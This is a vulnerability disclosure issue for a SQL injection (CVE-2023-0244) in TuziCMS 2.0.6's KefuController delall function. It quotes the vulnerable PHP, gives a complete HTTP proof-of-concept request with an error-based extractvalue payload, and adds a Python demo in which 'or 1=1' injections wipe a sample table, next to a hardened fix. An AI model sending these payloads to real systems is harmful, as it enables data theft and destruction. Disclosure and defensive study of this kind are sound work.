Headline
CVE-2023-0244: \App\Manage\Controller\KefuController.class.php has SQLinject · Issue #13 · yeyinshi/tuzicms
A vulnerability classified as critical was found in TuziCMS 2.0.6. This vulnerability affects the function delall of the file \App\Manage\Controller\KefuController.class.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-218152.
line: 157 - 196
```php
    public function delall(){
        //dump($_POST);
        //exit;
        $m=D('Advert'); // database table; the table prefix is defined in the config file, so it is not written here
        $id = I('post.id');
        //dump($id);
        //exit;
        if ($id==null){
            $this->error('Please select items to delete!');
        }
        // check whether id is an array or a single value
        if(is_array($id)){
            $where = 'id in('.implode(',',$id).')';
            // implode() returns a string made by joining the array elements
        }else{
            $where = 'id='.$id;
        }
        //dump($where);
        //exit;
        $m=M('Advert');
        $arr=$m->where($where)->select();
        foreach ($arr as $key => $value){
            $images=$value['advert_image'];
            //dump($images);
            //exit;
            unlink('./Uploads/'.$images);
        }
        $count=$m->where($where)->delete(); // use save() to update a record
        if ($count>0){
            $this->success("Successfully deleted {$count} record(s)!");
        }
        else {
            $this->error('Batch delete failed!');
        }
    }
```
The ThinkPHP framework's safe query syntax (array conditions or bound parameters) is not used here. Instead, `$id`, taken straight from the POST body, is concatenated into the `$where` string that is passed to both `select()` and `delete()`. Both branches are affected: a scalar `id` is appended to `'id='` unchanged, and an array `id` is joined with `implode()` with no check that its elements are integers. The result is a serious SQL injection vulnerability that may cause serious harm to the system.
PoC:
```http
POST /index.php/manage/kefu/delall HTTP/1.1
Host: www.tuzi.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

id=1/**/and/**/(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))
```
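The following is an added example, not code from TuziCMS or from the issue author. It models the `$where` construction from `delall()` in Python (both the scalar `'id='.$id` branch and the array `implode(',', $id)` branch) and runs it against a constructed in-memory SQLite table standing in for the Advert table, so the effect of an injected `id` can be observed offline. SQLite has no `extractvalue()`, so the PoC payload above is shown only as the string it produces; a simpler `or 1=1` payload is used to demonstrate the damage. Beside it is a hardened version that accepts only decimal integer ids and binds them as parameters, which rejects the PoC payload outright. Table name, column names and the sample rows are assumptions for the demonstration.

```python
import re
import sqlite3

# Constructed sample data: a stand-in for the Advert table (assumed columns).
SAMPLE_ROWS = [(1, "a.jpg"), (2, "b.jpg"), (3, "c.jpg")]

# The exact id value from the PoC request above (MySQL inline comments as whitespace).
POC_PAYLOAD = "1/**/and/**/(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))"


def fresh_db():
    """Create a throwaway in-memory table with the constructed sample rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE advert (id INTEGER PRIMARY KEY, advert_image TEXT)")
    con.executemany("INSERT INTO advert VALUES (?, ?)", SAMPLE_ROWS)
    con.commit()
    return con


def vulnerable_where(post_id):
    """Mirror of the PHP: 'id in('.implode(',',$id).')' for arrays, 'id='.$id otherwise."""
    if isinstance(post_id, list):
        return "id in(" + ",".join(post_id) + ")"
    return "id=" + post_id


def vulnerable_delete(con, post_id):
    """Same flow as delall(): the untrusted WHERE fragment is spliced into the statement."""
    cur = con.execute("DELETE FROM advert WHERE " + vulnerable_where(post_id))
    con.commit()
    return cur.rowcount


class BadId(ValueError):
    """Raised by the hardened path when an id is not a plain decimal integer."""


def safe_ids(post_id):
    """Hardened input handling: every id must match [0-9]+ and is converted to int.

    Anything else (spaces, comments, parentheses, function names) is rejected,
    which is what stops the PoC payload before it reaches the database.
    """
    values = post_id if isinstance(post_id, list) else [post_id]
    ids = []
    for v in values:
        if not isinstance(v, str) or not re.fullmatch(r"[0-9]+", v):
            raise BadId(f"rejected id value: {v!r}")
        ids.append(int(v))
    if not ids:
        raise BadId("no ids supplied")
    return ids


def safe_delete(con, post_id):
    """Hardened delete: validated ints bound as parameters, never string-spliced."""
    ids = safe_ids(post_id)
    placeholders = ",".join("?" * len(ids))
    cur = con.execute(f"DELETE FROM advert WHERE id IN ({placeholders})", ids)
    con.commit()
    return cur.rowcount


def demo():
    """Run the scenarios side by side and return what each one did."""
    results = {
        # A legitimate single delete removes exactly one row in both versions.
        "vuln_single": vulnerable_delete(fresh_db(), "2"),
        # Scalar branch: 'id=1 or 1=1' wipes every row.
        "vuln_scalar_injected": vulnerable_delete(fresh_db(), "1 or 1=1"),
        # Array branch: implode() joins an element that closes the IN list and appends a tautology.
        "vuln_array_injected": vulnerable_delete(fresh_db(), ["1", "2) or (1=1"]),
        # What delall() would send to MySQL for the PoC body (not executed here).
        "poc_where": vulnerable_where(POC_PAYLOAD),
        # Hardened path with valid input still works.
        "safe_array": safe_delete(fresh_db(), ["1", "3"]),
    }
    try:
        safe_ids(POC_PAYLOAD)
        results["poc_rejected"] = False
    except BadId:
        results["poc_rejected"] = True
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Note that the PoC payload contains no quotes or angle brackets, so output-style escaping of those characters would not have helped; the fix is to reject anything that is not an integer and to pass the values as bound parameters (or, in ThinkPHP, as array conditions) rather than as SQL text.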